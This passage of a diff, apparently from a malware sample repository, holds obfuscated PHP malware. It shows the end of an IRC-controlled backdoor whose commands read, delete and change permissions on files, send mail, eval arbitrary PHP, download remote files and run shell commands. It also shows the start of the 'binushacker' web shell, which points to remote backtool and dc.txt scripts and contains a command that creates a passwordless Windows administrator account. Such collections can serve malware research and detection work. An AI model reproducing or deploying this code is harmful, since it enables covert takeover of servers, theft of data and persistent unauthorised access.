i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("Sk9JTg==")." ".ef9feaa9bcab30($oec12e0af93cb5['ch'])." ".ef9feaa9bcab30($oec12e0af93cb5['ke']));
|
||||||
|
} else if(isset($xdfff0a7fa1a55[1]) && $xdfff0a7fa1a55[1] == ub5d21085bf2c0("NDMz")) { i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14");
|
||||||
|
} else if (isset($b6e2baaf3b97db[1]) && isset($xee11cbb19052e[$b6e2baaf3b97db[1]])) { unset($xee11cbb19052e[$b6e2baaf3b97db[1]]);
|
||||||
|
} else if (isset($b6e2baaf3b97db[1]) && ($b6e2baaf3b97db[1] == ub5d21085bf2c0("UFJJVk1TRw==") || $b6e2baaf3b97db[1] == "332")) {
|
||||||
|
$o78e731027d8fd = strstr($l7fabc1404929c," :"); $o78e731027d8fd = substr($o78e731027d8fd,2); $xdfff0a7fa1a55 = explode(" ",$o78e731027d8fd);
|
||||||
|
$z67b3dba8bc677 = $b6e2baaf3b97db[0]; $f7c6483ddcd99e = explode("!",$z67b3dba8bc677); $f7c6483ddcd99e = substr($f7c6483ddcd99e[0],1);
|
||||||
|
$e73be252ca8221 = FALSE; if ($xdfff0a7fa1a55[0] == "\1".ub5d21085bf2c0("VkVSU0lPTg==")."\1") { i56eacb300613d($o351a1d2ad68bc,"NOTICE ".$f7c6483ddcd99e." :\1".ub5d21085bf2c0("VkVSU0lPTg==")." ".ef9feaa9bcab30($oec12e0af93cb5['ve'])."\1");
|
||||||
|
} for ($v865c0c0b4ab0e=0;$v865c0c0b4ab0e<count($xdfff0a7fa1a55);$v865c0c0b4ab0e++) { if($xdfff0a7fa1a55[$v865c0c0b4ab0e] == "-s") {
|
||||||
|
$e73be252ca8221 = TRUE; } } if ($b6e2baaf3b97db[1] == "332") { $i01b6e20344b68 = $b6e2baaf3b97db[3];
|
||||||
|
} elseif ($b6e2baaf3b97db[2] == $d8052146769b14) { $i01b6e20344b68 = $f7c6483ddcd99e; } else { $i01b6e20344b68 = $b6e2baaf3b97db[2];
|
||||||
|
} if ($xdfff0a7fa1a55[0] == PHP_OS) { array_shift($xdfff0a7fa1a55); } if (substr($xdfff0a7fa1a55[0],0,1) == $oec12e0af93cb5['tr']) {
|
||||||
|
if (isset($xee11cbb19052e[$z67b3dba8bc677]) || $b6e2baaf3b97db[1] == "332") { switch (substr($xdfff0a7fa1a55[0],1)) {
|
||||||
|
case j69923efad5b7a("qGWaoKKb"): i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UVVJVCA6SSBRVUlU"));
|
||||||
|
fclose($o351a1d2ad68bc); exit(0); break; case j69923efad5b7a("tpWs"): if (count($xdfff0a7fa1a55)>1) {
|
||||||
|
i56eacb300613d($o351a1d2ad68bc, substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0]))); } break; case j69923efad5b7a("sKc="):
|
||||||
|
if (isset($xdfff0a7fa1a55[1])) { $s954eef6d6eac5 = $xdfff0a7fa1a55[1]; } else { $s954eef6d6eac5 = getcwd();
|
||||||
|
} if (is_dir($s954eef6d6eac5)) { if (($k736007832d216 = opendir($s954eef6d6eac5))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8gTm93IGxpc3Rpbmc6") ." \2".$s954eef6d6eac5."\2");
|
||||||
|
while (($a435ed7e9f07f7 = readdir($k736007832d216)) !== FALSE) { if ($a435ed7e9f07f7 != "." && $a435ed7e9f07f7 != "..") {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> (".filetype($s954eef6d6eac5."/".$a435ed7e9f07f7).") $a435ed7e9f07f7");
|
||||||
|
sleep(1); } } closedir(); } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y=") . " \2".$s954eef6d6eac5."\2");
|
||||||
|
} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RGlyLy8=") . " \2".$s954eef6d6eac5."\2 " . ub5d21085bf2c0("aXMgbm90IGEgZGlyIQ=="));
|
||||||
|
} break; case j69923efad5b7a("p5Wp"): if (count($xdfff0a7fa1a55) > 1) { if (is_file($xdfff0a7fa1a55[1])) {
|
||||||
|
if (($a0666f0acdeed3 = fopen($xdfff0a7fa1a55[1],"r"))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=") . " \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
while(!feof($a0666f0acdeed3)) { $g6438c669e0d0d = trim(fgets($a0666f0acdeed3,256)); zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> $g6438c669e0d0d");
|
||||||
|
sleep(1); } zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ=="));
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8gQ291bGRuJ3Qgb3Blbg==") . " \2".$xdfff0a7fa1a55[1]."\2 for reading.");
|
||||||
|
} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0FULy8=") . " \2".$xdfff0a7fa1a55[1]."\2 " . ub5d21085bf2c0("aXMgbm90IGEgZmlsZQ=="));
|
||||||
|
} } break; case j69923efad5b7a("tKuZ"): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("UFdELy8gQ3VycmVudCBkaXI6") ." ".getcwd());
|
||||||
|
break; case j69923efad5b7a("p5g="): if (count($xdfff0a7fa1a55) > 1) { if (chdir($xdfff0a7fa1a55[1])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0QvLyBDaGFuZ2VkIGRpciB0bw==") ." ".$xdfff0a7fa1a55[1]);
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
|
||||||
|
} } break; case j69923efad5b7a("tqE="): if (count($xdfff0a7fa1a55) > 1) { if (unlink($xdfff0a7fa1a55[1])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk0vLyBEZWxldGVk") . " \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl")." \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} } break; case j69923efad5b7a("uKOqlZs="): if (count($xdfff0a7fa1a55) > 1) { if (touch($xdfff0a7fa1a55[1])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VG91Y2gvLyBUb3VjaGVk") . " \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=") . " \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} } break; case j69923efad5b7a("t62inpySoA=="): if (count($xdfff0a7fa1a55) > 2) { if (symlink($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3ltTGluay8vIFN5bWxpbmtlZA==") . " \2".$xdfff0a7fa1a55[2]."\2 To \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$xdfff0a7fa1a55[2]."\2 To \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} } break; case j69923efad5b7a("p5ykqaE="): if (count($xdfff0a7fa1a55) > 2) { if (chown($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2hvd24vLyBDaG93bmVk") ." \2".$xdfff0a7fa1a55[1]."\2 To \2".$xdfff0a7fa1a55[2]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$xdfff0a7fa1a55[1]."\2 To \2".$xdfff0a7fa1a55[2]."\2");
|
||||||
|
} } break; case j69923efad5b7a("p5yioZc="): if (count($xdfff0a7fa1a55) > 2) { if(chmod($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$xdfff0a7fa1a55[1]."\2 with permissions \2".$xdfff0a7fa1a55[2]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} } break; case j69923efad5b7a("sZ+Zm6U="): if (count($xdfff0a7fa1a55) > 1) { if (mkdir($xdfff0a7fa1a55[1])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} } break; case j69923efad5b7a("tqGZm6U="): if (count($xdfff0a7fa1a55)>1) { if (rmdir($xdfff0a7fa1a55[1])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} } break; case j69923efad5b7a("p6Q="): if (count($xdfff0a7fa1a55) > 2) { if (copy($xdfff0a7fa1a55[1], $xdfff0a7fa1a55[2])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q1AvLyBDb3BpZWQ=") ." \2".$xdfff0a7fa1a55[1]."\2 to \2".$xdfff0a7fa1a55[2]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$xdfff0a7fa1a55[1]."\2 to \2".$xdfff0a7fa1a55[2]."\2");
|
||||||
|
} } break; case j69923efad5b7a("sZWeng=="): if (count($xdfff0a7fa1a55)>4) { $z099fb995346f3 = "From: <".$xdfff0a7fa1a55[2].">\r\n";
|
||||||
|
if (mail($xdfff0a7fa1a55[1], $xdfff0a7fa1a55[3], substr($o78e731027d8fd,$xdfff0a7fa1a55[4]), $z099fb995346f3)) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TWFpbC8v") . " Message sent to \2".$xdfff0a7fa1a55[1]."\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TWFpbC8v") . " Send failure");
|
||||||
|
} } break; case j69923efad5b7a("sZ+ilmg="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TUQ1Ly8=") . " ".md5($xdfff0a7fa1a55[1]));
|
||||||
|
break; case j69923efad5b7a("qKKo"): if (isset($xdfff0a7fa1a55[1])) { $g957b527bcfbad = explode(".",$xdfff0a7fa1a55[1]);
|
||||||
|
if (count($g957b527bcfbad)==4 && is_numeric($g957b527bcfbad[0]) && is_numeric($g957b527bcfbad[1]) && is_numeric($g957b527bcfbad[2]) && is_numeric($g957b527bcfbad[3])) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RE5TLy8=") . " ".$xdfff0a7fa1a55[1]." -> ".gethostbyaddr($xdfff0a7fa1a55[1]));
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("RE5TLy8=") . " ".$xdfff0a7fa1a55[1]." -> ".gethostbyname($xdfff0a7fa1a55[1]));
|
||||||
|
} } break; case j69923efad5b7a("tpmoppSWqQ=="): i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("UVVJVCA6UVVJVC4uLg=="));
|
||||||
|
fclose($o351a1d2ad68bc); dfc35fdc70d5fc(); break; case j69923efad5b7a("tqI="): if(isset($xdfff0a7fa1a55[1])) {
|
||||||
|
$d8052146769b14 = bd988971435842((int)$xdfff0a7fa1a55[1]); i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14");
|
||||||
|
} else { $d8052146769b14 = bd988971435842($oec12e0af93cb5['mrnd']); i56eacb300613d($o351a1d2ad68bc, ub5d21085bf2c0("TklDSw==")." $d8052146769b14");
|
||||||
|
} break; case j69923efad5b7a("tJyl"): if (count($xdfff0a7fa1a55) > 1) { eval(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])));
|
||||||
|
} break; case j69923efad5b7a("q5mp"): if (count($xdfff0a7fa1a55) > 2) { if (!($a0666f0acdeed3 = fopen($xdfff0a7fa1a55[2],"w"))) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
|
||||||
|
} else { if (!($db5eda0a74558a = file($xdfff0a7fa1a55[1]))) { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
|
||||||
|
} else { for ($v865c0c0b4ab0e = 0; $v865c0c0b4ab0e < count($db5eda0a74558a); $v865c0c0b4ab0e++) { fwrite($a0666f0acdeed3,$db5eda0a74558a[$v865c0c0b4ab0e]);
|
||||||
|
} zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("R2V0Ly8=") . " \2".$xdfff0a7fa1a55[1]."\2 downloaded to \2".$xdfff0a7fa1a55[2]."\2");
|
||||||
|
} fclose($a0666f0acdeed3); } } break; case j69923efad5b7a("sp0="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
|
||||||
|
break; case j69923efad5b7a("t50="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("U3lzaW5mby8v") . " [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
|
||||||
|
break; case j69923efad5b7a("tKOnpqKUmuw="): if (isset($xdfff0a7fa1a55[1],$xdfff0a7fa1a55[2])) { if (fsockopen($xdfff0a7fa1a55[1],(int)$xdfff0a7fa1a55[2],$f56bd7107802eb,$p341be97d9aff9,5)) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "".ub5d21085bf2c0("UG9ydENoay8v") ." ".$xdfff0a7fa1a55[1].":".$xdfff0a7fa1a55[2]." is \2Open\2");
|
||||||
|
} else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "".ub5d21085bf2c0("UG9ydENoay8v") ." ".$xdfff0a7fa1a55[1].":".$xdfff0a7fa1a55[2]." is \2Closed\2");
|
||||||
|
} } break; case j69923efad5b7a("uaKWn5g="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("VW5hbWUvLw==")." " .php_uname());
|
||||||
|
break; case j69923efad5b7a("rZg="): zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("SUQvLw==")." ".getmypid());
|
||||||
|
break; case j69923efad5b7a("p6GZ"): if (count($xdfff0a7fa1a55)>1) { $z1dccadfed7bcb = popen(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])),"r");
|
||||||
|
while (!feof($z1dccadfed7bcb)) { $l734515cbd3636 = trim(fgets($z1dccadfed7bcb,512)); if (strlen($l734515cbd3636)>0) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> ".$l734515cbd3636); sleep(1); }
|
||||||
|
} zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ=="));
|
||||||
|
} break; case j69923efad5b7a("p6GZZA=="): if (count($xdfff0a7fa1a55)>1) { $c2beda901e9726 = tempnam('/tmp', 'tmpfile');
|
||||||
|
$z1dccadfed7bcb = substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])); $z1dccadfed7bcb .= " >$c2beda901e9726";
|
||||||
|
$e3c0f0406c38df = "rm $c2beda901e9726"; r54d54a126a783($z1dccadfed7bcb); if (is_file($c2beda901e9726)) {
|
||||||
|
if (($a0666f0acdeed3 = fopen($c2beda901e9726,"r"))) { while(!feof($a0666f0acdeed3)) { $g6438c669e0d0d = trim(fgets($a0666f0acdeed3,256));
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, "> $g6438c669e0d0d"); sleep(1); }
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("PiBbRU9GXQ==")); } else {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q01ELy8gQ291bGRuJ3Qgb3BlbiB0bXBmaWxlLg=="));
|
||||||
|
} } else { zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("Q01ELy8gdG1wZmlsZSBpcyBub3QgYSBmaWxl"));
|
||||||
|
} r54d54a126a783($e3c0f0406c38df); } break; case j69923efad5b7a("qayalaiYmg=="): r54d54a126a783(substr($o78e731027d8fd,strlen($xdfff0a7fa1a55[0])));
|
||||||
|
break; } } else { switch(substr($xdfff0a7fa1a55[0],1)) { case j69923efad5b7a("bg=="): if (isset($xdfff0a7fa1a55[1]) && md5($xdfff0a7fa1a55[1]) == ef9feaa9bcab30($oec12e0af93cb5['pa']) && preg_match(ef9feaa9bcab30($oec12e0af93cb5['ha']),$z67b3dba8bc677)) {
|
||||||
|
zf2f4e964f79d0($o351a1d2ad68bc, $e73be252ca8221, $i01b6e20344b68, ub5d21085bf2c0("UmVhZHkvLyBPaw=="));
|
||||||
|
$xee11cbb19052e[$z67b3dba8bc677] = TRUE; } else { zf2f4e964f79d0($o351a1d2ad68bc, FALSE, ef9feaa9bcab30($oec12e0af93cb5['ch']), ub5d21085bf2c0("UmVhZHkvLyByZWplY3RlZA=="));
|
||||||
|
} break; } } } } $ed707b8140a662 = $l7fabc1404929c; } fclose($o351a1d2ad68bc); sleep(3); dfc35fdc70d5fc();
|
||||||
|
} else { shuffle($n59b514174bffe); dfc35fdc70d5fc(); } } function i56eacb300613d($k317d37b0edc7b, $o78e731027d8fd) {
|
||||||
|
fwrite($k317d37b0edc7b,"$o78e731027d8fd\r\n"); } function zf2f4e964f79d0($k317d37b0edc7b, $e73be252ca8221, $i01b6e20344b68, $o78e731027d8fd) {
|
||||||
|
if($e73be252ca8221 != TRUE) { i56eacb300613d($k317d37b0edc7b, ub5d21085bf2c0("UFJJVk1TRw==")." $i01b6e20344b68 :$o78e731027d8fd");
|
||||||
|
} } function j69923efad5b7a($mc7a1ddb19daba) { $db4a88417b3d01 = ''; $mc7a1ddb19daba = base64_decode($mc7a1ddb19daba);
|
||||||
|
for($v865c0c0b4ab0e=0; $v865c0c0b4ab0e<strlen($mc7a1ddb19daba); $v865c0c0b4ab0e++) { $ja87deb01c5f53 = substr($mc7a1ddb19daba, $v865c0c0b4ab0e, 1);
|
||||||
|
$vae0e1268c3859 = substr(ub5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="), ($v865c0c0b4ab0e % strlen(ub5d21085bf2c0("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q=")))-1, 1);
|
||||||
|
$ja87deb01c5f53 = chr(ord($ja87deb01c5f53)-ord($vae0e1268c3859)); $db4a88417b3d01.=$ja87deb01c5f53;
|
||||||
|
} return $db4a88417b3d01; } function bd988971435842($ufac65290966c7) { for ($v865c0c0b4ab0e = 0; $v865c0c0b4ab0e < $ufac65290966c7; $v865c0c0b4ab0e++)
|
||||||
|
$a2cb9df9898e55 .= chr(mt_rand(0,25)+97); if (posix_getegid() == 0) $a2cb9df9898e55 = "r-".$a2cb9df9898e55;
|
||||||
|
return $a2cb9df9898e55; } function r54d54a126a783($o111ca5df4a68b) { $g9b207167e5381 = ''; if (!empty($o111ca5df4a68b))
|
||||||
|
{ if(function_exists('exec')) { @exec($o111ca5df4a68b,$g9b207167e5381); $g9b207167e5381 = join("\n",$g9b207167e5381);
|
||||||
|
} elseif(function_exists('shell_exec')) { $g9b207167e5381 = @shell_exec($o111ca5df4a68b); } elseif(function_exists('system'))
|
||||||
|
{ @ob_start(); @system($o111ca5df4a68b); $g9b207167e5381 = @ob_get_contents(); @ob_end_clean(); }
|
||||||
|
elseif(function_exists('passthru')) { @ob_start(); @passthru($o111ca5df4a68b); $g9b207167e5381 = @ob_get_contents();
|
||||||
|
@ob_end_clean(); } elseif(@is_resource($s8fa14cdd754f9 = @popen($o111ca5df4a68b,"r"))) { $g9b207167e5381 = "";
|
||||||
|
while(!@feof($s8fa14cdd754f9)) { $g9b207167e5381 .= @fread($s8fa14cdd754f9,1024); } @pclose($s8fa14cdd754f9);
|
||||||
|
} } return $g9b207167e5381; } function ef9feaa9bcab30($mc7a1ddb19daba) { $db4a88417b3d01 = ''; $mc7a1ddb19daba = base64_decode($mc7a1ddb19daba);
|
||||||
|
for($v865c0c0b4ab0e=0; $v865c0c0b4ab0e<strlen($mc7a1ddb19daba); $v865c0c0b4ab0e++) { $ja87deb01c5f53 = substr($mc7a1ddb19daba, $v865c0c0b4ab0e, 1);
|
||||||
|
$vae0e1268c3859 = substr(ub5d21085bf2c0("MyNGJV4kNSUkMzYjNjU2NTg5MDg5OTcwODMyMzEyNCFAIzQ1XiQlNiM1NmZEZ1NERmdTREZHUkVUcmV0V1JFVGVycHJlV1IqU0RGI0AjNSQlNiQlXiM0fiEhQH4hQCF+QCF+fiFAJCM1IyQ1JDMlR2hEZ0hnZmdmZ0ZoZ2hHRmhmZ1RSeXR5JV5nZkg0MzQzVkYjRURFY0BDQGVDI0VjSjxJTC4+Pk08PzxNPmVSdEVRdFdFUg=="), ($v865c0c0b4ab0e % strlen(ub5d21085bf2c0("MyNGJV4kNSUkMzYjNjU2NTg5MDg5OTcwODMyMzEyNCFAIzQ1XiQlNiM1NmZEZ1NERmdTREZHUkVUcmV0V1JFVGVycHJlV1IqU0RGI0AjNSQlNiQlXiM0fiEhQH4hQCF+QCF+fiFAJCM1IyQ1JDMlR2hEZ0hnZmdmZ0ZoZ2hHRmhmZ1RSeXR5JV5nZkg0MzQzVkYjRURFY0BDQGVDI0VjSjxJTC4+Pk08PzxNPmVSdEVRdFdFUg==")))-1, 1);
|
||||||
|
$ja87deb01c5f53 = chr(ord($ja87deb01c5f53)-ord($vae0e1268c3859)); $db4a88417b3d01.=$ja87deb01c5f53;
|
||||||
|
} return $db4a88417b3d01; } function bfb0daa8f01135($ufac65290966c7) { $a2cb9df9898e55 = ""; for ($v865c0c0b4ab0e=0;$v865c0c0b4ab0e<$ufac65290966c7; $v865c0c0b4ab0e++)
|
||||||
|
$a2cb9df9898e55 .= chr(mt_rand(0,25)+97); return $a2cb9df9898e55; } dfc35fdc70d5fc(); ?>
|
2208
PHP/Backdoor.PHP.Agent.aj
Normal file
2208
PHP/Backdoor.PHP.Agent.aj
Normal file
File diff suppressed because it is too large
Load Diff
712
PHP/Backdoor.PHP.Agent.ak
Normal file
712
PHP/Backdoor.PHP.Agent.ak
Normal file
@ -0,0 +1,712 @@
|
|||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<meta http-equiv="Content-Language" content="pt-br">
|
||||||
|
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
|
||||||
|
<meta name="ProgId" content="AoD">
|
||||||
|
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
|
||||||
|
<title>By binushacker > AoD > CMD > File List</title>
|
||||||
|
<style type="text/css">
|
||||||
|
A:link {text-decoration:none}
|
||||||
|
A:visited {text-decoration:none}
|
||||||
|
A:hover {text-decoration:underline}
|
||||||
|
A:active {text-decoration:underline}
|
||||||
|
body,td {
|
||||||
|
font-family: verdana;
|
||||||
|
font-size: 8pt;
|
||||||
|
background-color: #FFCC00;
|
||||||
|
}
|
||||||
|
a{
|
||||||
|
color: #0000FF;
|
||||||
|
text-decoration: none;
|
||||||
|
}
|
||||||
|
a:hover {
|
||||||
|
color: #FF0000;
|
||||||
|
text-decoration: underline;
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body >
|
||||||
|
<center><h2>..:: http://www.binushacker.com #binushacker @ irc.dal.net ::..</h2></center>
|
||||||
|
<?php
|
||||||
|
|
||||||
|
@set_time_limit(0);
|
||||||
|
|
||||||
|
$string = $_SERVER['QUERY_STRING'];
|
||||||
|
$mhost = 'http://www.binushacker.com/download/cmd.do?';
|
||||||
|
$host_all = explode("$mhost", $string);
|
||||||
|
$s1 = $host_all[0];
|
||||||
|
$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
|
||||||
|
|
||||||
|
$OS = @PHP_OS;
|
||||||
|
$IpServer = '127.0.0.1';
|
||||||
|
$UNAME = @php_uname();
|
||||||
|
$PHPv = @phpversion();
|
||||||
|
$SafeMode = @ini_get('safe_mode');
|
||||||
|
|
||||||
|
if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
|
||||||
|
else { $SafeMode = "<i>$SafeMode</i>"; }
|
||||||
|
|
||||||
|
$btname = 'backtool.txt';
|
||||||
|
$bt = 'http://www.full-comandos.com/jobing/r0nin';
|
||||||
|
$dc = 'http://www.full-comandos.com/jobing/dc.txt';
|
||||||
|
$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup
|
||||||
|
|
||||||
|
|
||||||
|
"Administrators" /add Admin;net localgroup "Users" /del Admin';
|
||||||
|
$bn = 'http://www.binushacker.com/download/cmd.do';
|
||||||
|
// Java Script
|
||||||
|
echo "<script type=\"text/javascript\">";
|
||||||
|
|
||||||
|
echo "function ChMod(chdir, file) {";
|
||||||
|
echo "var o = prompt('Chmod: - Contoh: 0777', '');";
|
||||||
|
echo "if (o) {";
|
||||||
|
echo "window.location=\"\" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file +
|
||||||
|
|
||||||
|
